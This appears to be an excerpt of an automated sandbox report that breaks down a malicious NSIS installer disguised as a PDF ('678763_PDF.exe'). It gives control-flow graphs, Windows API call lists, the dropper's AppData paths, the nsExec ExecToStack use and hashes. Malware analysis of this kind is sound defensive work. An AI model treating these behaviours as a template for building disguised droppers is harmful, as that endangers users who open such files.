                                                                                                                                                                                    control_flow_graph 514 406594-40659d 515 4065b0-4065ca 514->515 516 40659f-4065ae 514->516 517 4065d0-4065dc 515->517 518 4067da-4067e0 515->518 516->515 517->518 519 4065e2-4065e9 517->519 520 4067e6-4067f3 518->520 521 4065ee-4065fb 518->521 519->518 523 4067f5-4067fa call 406557 520->523 524 4067ff-406802 520->524 521->520 522 406601-40660a 521->522 525 406610-406653 522->525 526 4067c7 522->526 523->524 530 406659-406665 525->530 531 40676b-40676f 525->531 528 4067d5-4067d8 526->528 529 4067c9-4067d3 526->529 528->518 529->518 532 406667 530->532 533 40666f-406671 530->533 534 406771-406778 531->534 535 4067a3-4067a7 531->535 532->533 540 406673-406699 call 406425 533->540 541 4066ab-4066ae 533->541 538 406788-406794 call 406557 534->538 539 40677a-406786 call 40649e 534->539 536 4067b7-4067c5 lstrlenW 535->536 537 4067a9-4067b2 call 406594 535->537 536->518 537->536 549 406799-40679f 538->549 539->549 554 406753-406756 540->554 555 40669f-4066a6 call 406594 540->555 543 4066b0-4066bc GetSystemDirectoryW 541->543 544 4066c1-4066c4 541->544 550 40674e-406751 543->550 551 4066d6-4066da 544->551 552 4066c6-4066d2 GetWindowsDirectoryW 544->552 549->536 556 4067a1 549->556 550->554 557 406763-406769 call 406805 550->557 551->550 558 4066dc-4066fa 551->558 552->551 554->557 560 406758-40675e lstrcatW 554->560 555->550 556->557 557->536 562 4066fc-406702 558->562 563 40670e-406726 call 40694b 558->563 560->557 567 40670a-40670c 562->567 571 406728-40673b SHGetPathFromIDListW CoTaskMemFree 563->571 572 40673d-406746 563->572 567->563 569 406748-40674c 567->569 569->550 571->569 571->572 572->558 572->569
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066B6
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 004066CC
                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 0040672A
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                                                                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 0040675E
                                                                                                                                                                                    • lstrlenW.KERNEL32(: Completed,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 004067B8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                    • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antholite
                                                                                                                                                                                    • API String ID: 4024019347-2831730964
                                                                                                                                                                                    • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                                                                    • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 573 4032b9-4032d0 574 4032d2 573->574 575 4032d9-4032e2 573->575 574->575 576 4032e4 575->576 577 4032eb-4032f0 575->577 576->577 578 403300-40330d call 4034d4 577->578 579 4032f2-4032fb call 4034ea 577->579 583 4034c2 578->583 584 403313-403317 578->584 579->578 585 4034c4-4034c5 583->585 586 40346d-40346f 584->586 587 40331d-403366 GetTickCount 584->587 590 4034cd-4034d1 585->590 588 403471-403474 586->588 589 4034af-4034b2 586->589 591 4034ca 587->591 592 40336c-403374 587->592 588->591 595 403476 588->595 593 4034b4 589->593 594 4034b7-4034c0 call 4034d4 589->594 591->590 596 403376 592->596 597 403379-403387 call 4034d4 592->597 593->594 594->583 607 4034c7 594->607 600 403479-40347f 595->600 596->597 597->583 606 40338d-403396 597->606 603 403481 600->603 604 403483-403491 call 4034d4 600->604 603->604 604->583 610 403493-40349f call 4060f9 604->610 609 40339c-4033bc call 406aa6 606->609 607->591 615 4033c2-4033d5 GetTickCount 609->615 616 403465-403467 609->616 617 4034a1-4034ab 610->617 618 403469-40346b 610->618 619 403420-403422 615->619 620 4033d7-4033df 615->620 616->585 617->600 621 4034ad 617->621 618->585 624 403424-403428 619->624 625 403459-40345d 619->625 622 4033e1-4033e5 620->622 623 4033e7-403418 MulDiv wsprintfW call 4055dc 620->623 621->591 622->619 622->623 632 40341d 623->632 628 40342a-403431 call 4060f9 624->628 629 40343f-40344a 624->629 625->592 626 403463 625->626 626->591 633 403436-403438 628->633 631 40344d-403451 629->631 631->609 634 403457 631->634 632->619 633->618 635 40343a-40343d 633->635 634->591 635->631
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                    • String ID: *B$ FB$ A$ A$... %d%%
                                                                                                                                                                                    • API String ID: 551687249-3833040932
                                                                                                                                                                                    • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                                                                    • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                                                                                                                    • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 636 401774-401799 call 402dab call 405e9d 641 4017a3-4017b5 call 406557 call 405e26 lstrcatW 636->641 642 40179b-4017a1 call 406557 636->642 647 4017ba-4017bb call 406805 641->647 642->647 651 4017c0-4017c4 647->651 652 4017c6-4017d0 call 4068b4 651->652 653 4017f7-4017fa 651->653 661 4017e2-4017f4 652->661 662 4017d2-4017e0 CompareFileTime 652->662 655 401802-40181e call 406047 653->655 656 4017fc-4017fd call 406022 653->656 663 401820-401823 655->663 664 401892-4018bb call 4055dc call 4032b9 655->664 656->655 661->653 662->661 665 401874-40187e call 4055dc 663->665 666 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 663->666 678 4018c3-4018cf SetFileTime 664->678 679 4018bd-4018c1 664->679 676 401887-40188d 665->676 666->651 698 401869-40186a 666->698 680 402c38 676->680 682 4018d5-4018e0 CloseHandle 678->682 679->678 679->682 686 402c3a-402c3e 680->686 683 4018e6-4018e9 682->683 684 402c2f-402c32 682->684 687 4018eb-4018fc call 406594 lstrcatW 683->687 688 4018fe-401901 call 406594 683->688 684->680 694 401906-4023a7 call 405bb7 687->694 688->694 694->684 694->686 698->676 700 40186c-40186d 698->700 700->665
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden,?,?,00000031), ref: 004017B5
                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden,?,?,00000031), ref: 004017DA
                                                                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                                                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp$C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\erstatningsgraden$ExecToStack
                                                                                                                                                                                    • API String ID: 1941528284-1904372047
                                                                                                                                                                                    • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                                                                    • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 702 4055dc-4055f1 703 4055f7-405608 702->703 704 4056a8-4056ac 702->704 705 405613-40561f lstrlenW 703->705 706 40560a-40560e call 406594 703->706 708 405621-405631 lstrlenW 705->708 709 40563c-405640 705->709 706->705 708->704 710 405633-405637 lstrcatW 708->710 711 405642-405649 SetWindowTextW 709->711 712 40564f-405653 709->712 710->709 711->712 713 405655-405697 SendMessageW * 3 712->713 714 405699-40569b 712->714 713->714 714->704 715 40569d-4056a0 714->715 715->704
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                    • lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                    • lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                                                                                                                    • SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                    • String ID: antholite
                                                                                                                                                                                    • API String ID: 2531174081-3488562018
                                                                                                                                                                                    • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                                                    • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 716 4068db-4068fb GetSystemDirectoryW 717 4068fd 716->717 718 4068ff-406901 716->718 717->718 719 406912-406914 718->719 720 406903-40690c 718->720 722 406915-406948 wsprintfW LoadLibraryExW 719->722 720->719 721 40690e-406910 720->721 721->722
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040692D
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                                    • API String ID: 2200240437-1106614640
                                                                                                                                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                    • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 723 406076-406082 724 406083-4060b7 GetTickCount GetTempFileNameW 723->724 725 4060c6-4060c8 724->725 726 4060b9-4060bb 724->726 727 4060c0-4060c3 725->727 726->724 728 4060bd 726->728 728->727
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00406094
                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                    • API String ID: 1716503409-678247507
                                                                                                                                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                    • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 729 4015c6-4015da call 402dab call 405ed1 734 401636-401639 729->734 735 4015dc-4015ef call 405e53 729->735 737 401668-4022fb call 401423 734->737 738 40163b-40165a call 401423 call 406557 SetCurrentDirectoryW 734->738 742 4015f1-4015f4 735->742 743 401609-40160c call 405b05 735->743 753 402c2f-402c3e 737->753 738->753 755 401660-401663 738->755 742->743 746 4015f6-4015fd call 405b22 742->746 752 401611-401613 743->752 746->743 759 4015ff-401602 call 405aab 746->759 756 401615-40161a 752->756 757 40162c-401634 752->757 755->753 760 401629 756->760 761 40161c-401627 GetFileAttributesW 756->761 757->734 757->735 764 401607 759->764 760->757 761->757 761->760 764->752
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405EDF
                                                                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                                                                                      • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\erstatningsgraden,?,00000000,000000F0), ref: 00401652
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00401645
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                                                                                                                    • API String ID: 1892508949-1967000036
                                                                                                                                                                                    • Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                                                                                                                    • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                                                                                                                    • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
